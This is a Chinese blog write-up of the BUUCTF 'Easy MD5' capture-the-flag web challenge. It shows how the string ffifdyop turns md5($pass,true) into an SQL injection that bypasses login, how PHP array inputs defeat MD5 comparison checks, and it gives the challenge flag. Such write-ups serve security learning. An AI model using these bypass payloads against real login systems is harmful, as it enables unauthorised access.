BUUCTF - Web - Easy MD5

最新推荐文章于 2024-05-02 14:43:09 发布
最新推荐文章于 2024-05-02 14:43:09 发布
阅读量1.6k 收藏
点赞数 3
分类专栏: ctf Writeup 文章标签: 开发语言 后端 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SuichI314/article/details/121577167
版权

题目就是一个很普通的表单,F12也看不到什么
在这里插入图片描述
随便填个数据抓包看一下
在这里插入图片描述

select * from 'admin' where password=md5($pass,true)

看来突破点是md5($pass, true)
md5($pass)的意思是计算$pass的MD5的值并返回十六进制格式,如果设置为true,将以二进制的形式返回,这里存在一个漏洞

$pass = ffifdyop的时候,md5($pass,true) => 'or'6xxxxx

<?php

$a = 'ffifdyop';
echo md5($a);
echo "\n";
echo md5($a, true);

?>

输出结果:
在这里插入图片描述
这样会导致原本的查询语言会变成:

select * from 'admin' where password= ''or 1	//永真

输入ffifdyop,登录成功
跳到这个页面
在这里插入图片描述
查看源代码:

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

payload:?a[]=1&b[]=2

到达以下页面:

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

payload:param1[]=1&param2[]=2
在这里插入图片描述
得到:flag{15332b95-2169-45b1-913a-063da23053ad}

1ta-chi
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
buuctf web [BJDCTF2020]Easy MD5
m0_61903191的博客
12-13 421
md5()可以计算字符串的「MD5散列值」。语法stringmd5&str, raw)参数$str:需要计算的字符串raw:指定十六进制或二进制输出格式返回值计算成功,就返回MD5值;计算失败,就返回false。
BUUctfweb:[BJDCTF2020]Easy MD5
羽的博客
07-12 314
搞得像个SQL注入一样,忍不住'#了一下。 后面就不太找得到突破点了。 看来下WP结果意想不到。 Hint: select * from 'admin' where password=md5($pass,true) 响应头里面有个这个。 查查md5函数 md5函数在指定了true的时候,是返回的原始 16 字符二进制格式。可能会返回这样子的字符串:'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1和SQL语句拼接就可以是: select * from ‘a...
CTF WebBUUCTF [BJDCTF2020]Easy MD5 Writeup(代码审计+PHP+MD5的SQL注入+MD5的0e绕过+MD5的数组绕过)
最新发布
HEX9CF的技术博客
05-02 413
1。
buuctf easymd5
ANYOUZHEN的博客
05-26 614
点击f12,查看源代码看看有没有消息 Hint:select * from ‘admin’ where password =md5($pass,ture) 我们要让password=md5($pass,ture) mysql里面,在用作布尔型判断时,以数字开头的字符串会被当做整型数。 要注意的是这种情况是必须要有单引号括起来的,比如password=‘xxx’ or ‘1xxxxxxxxx’,那么就相当于password=‘xxx’ or 1 ,也就相当于password=‘xxx’ or
buuctfeasy_md5
Aillikew的博客
11-25 426
①ffifdyop,这个点的原理是 ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c,这个字符串前几位刚好是 ‘ or ‘6,而 Mysql 刚好又会吧 hex 转成 ascii 解释,因此拼接之后的形式是。==绕过MD5弱类型比较。正经做的话,直接可以利用数组来绕过,构造?a[]=1&b[]=2 即可,由于 md5 函数哈希数组会返回 NULL,因此只要传两个不同的数组即可绕过限制。
web | CTFBUUCTF [BJDCTF2020]Easy MD5
weixin_46301214的博客
02-16 796
我们传进去的是数组,那么两个变量就肯定不相等,但md5函数识别不了数组,当成是同一个数组进行加密,那得到的结果肯定一样啊,这个属于phpmd5漏洞了吧。这里好像说是MySQL特性,只有数字在开头才算有东西,字母在前面是没东西的,所以6xxx刚好算是有东西,判定为 true。两个等号的情况下 == ,只要是0e开头,都会当成科学计数法,无论是0的多少次方,通通都是0。居然是真的,原理就是这样子,只要有东西,就算是true,那就忽略密码直接判断为true。来到第二个页面,啥也没有,照旧两步骤,看源码和抓包。
easy-web-iframe-master.zip
05-07
"easy-web-iframe-master.zip" 是一个包含"easy-web"框架的iframe实现的源代码压缩包,主要用于构建后台管理系统。这个框架结合了layui,一个流行的前端UI库,以提供高效、简洁的界面设计和交互体验。在开发企业级...
WaveMaker - Web Development Made Easy-开源
04-26
易于使用的开源Web开发平台。 可视化,拖放工具使任何人都能以最小的学习曲线来创建Web应用程序。 Java体系结构:Spring,Hibernate,Ajax Dojo工具包,MySQL,PostgreSQL,HSQLDB(捆绑HSQLDB)
EASY-UI示例;EASY-UI示例
09-13
EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例
easy-rsa-2.2.0.tar.gz
06-30
首先,我们需要从源代码包`easy-rsa-2.2.0.tar.gz`中解压并安装。这通常包括解压、进入目录、配置和编译过程。在Unix/Linux环境下,可以使用以下命令: ``` tar -zxvf easy-rsa-2.2.0.tar.gz cd easy-rsa-2.2.0 ./...
EasyDarwin-linux-8.1.0.zip
06-18
标题 "EasyDarwin-linux-8.1.0.zip" 提供了我们正在处理的是一个针对Linux操作系统的EasyDarwin软件的版本,具体是8.1.0。EasyDarwin是一款开源的、基于标准RTSP/RTP协议的实时流媒体服务器系统,它允许用户构建自己...
BUUCTF Easy MD5
qq_54929891的博客
02-28 3141
先把提示的文档下载下来,可以发现md5里面的几个php文件 既然提示是MD5,我就没往sql注入方向想,在F12下找下有没有可利用的线索 没有什么注释可以让我们知道要输入什么 既然是leveldo4.php页面,那我们便打开一下给我们的源代码看看 拖到最底部可以看到php代码,如果GET方法上传的password的值为ffifdyop,则转到levels91.php页面,那我们便直接在输入框输入ffifdyop 跳到新页面后的F12里面注释了一些代码,考的是md5的弱比较 ...
BUUCTF--MD5 writeup分享
m0_74374798的博客
07-03 760
Crypto--MD5 writeup
BUUCTF题解——MD5
qq_62745045的博客
05-17 228
BUUCTF题解
BUUCTF easy webmd5的问题
qq_44927883的博客
12-03 1483
看了大家的wp,在绕过下面的md5的时候,都是通过两个特殊的值绕过的,但经测后发现不对。 if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) { echo `$cmd`; } else { echo ("md5 is funny ~"); } 启动本地php跑一下 <?php echo (string)$_GET['a']; echo "
ctf (easy_md5)
Glacier_Mount的博客
08-07 1145
简单的md5()函数 php弱等于和强等于
buuctf-[BJDCTF2020]Easy MD5
Nothing-one的博客
11-02 152
打开网站我们可以看到一个类似于sql注入的一个东西。 我们可以向输入进去一个1来看看什么也没有用sql注入显然是不可行的,我们就用bp来进行抓包, 解读一下这个语句其中password后面的就是我们在那个输入框中输入的东西。 这里面我们也就用到了md5中的一个绕过技巧。就是ffifdyop来绕过。 之后我们就可以构造payload?a[]=1&b[]=2; 这样我们就可以看到了 之后我们再用post传值 ...
Buuctf [BJDCTF2020]Easy MD5
m0_64444909的博客
07-25 1366
.
BUUCTF 丢失的MD5 1
YueXuan_521的博客
06-08 746
BUUCTF 丢失的MD5 1
buuctf web easy sql
12-18
根据提供的引用内容,buuctf web easy sql 是一个关于SQL注入的题目。根据引用[1],给出的SQL语句是一个拼接字符串的方式,其中包含了一个注入点。而引用中提到的sql_mode中的PIPES_AS_CONCAT选项将 || 视为字符串的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1ta-chi

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值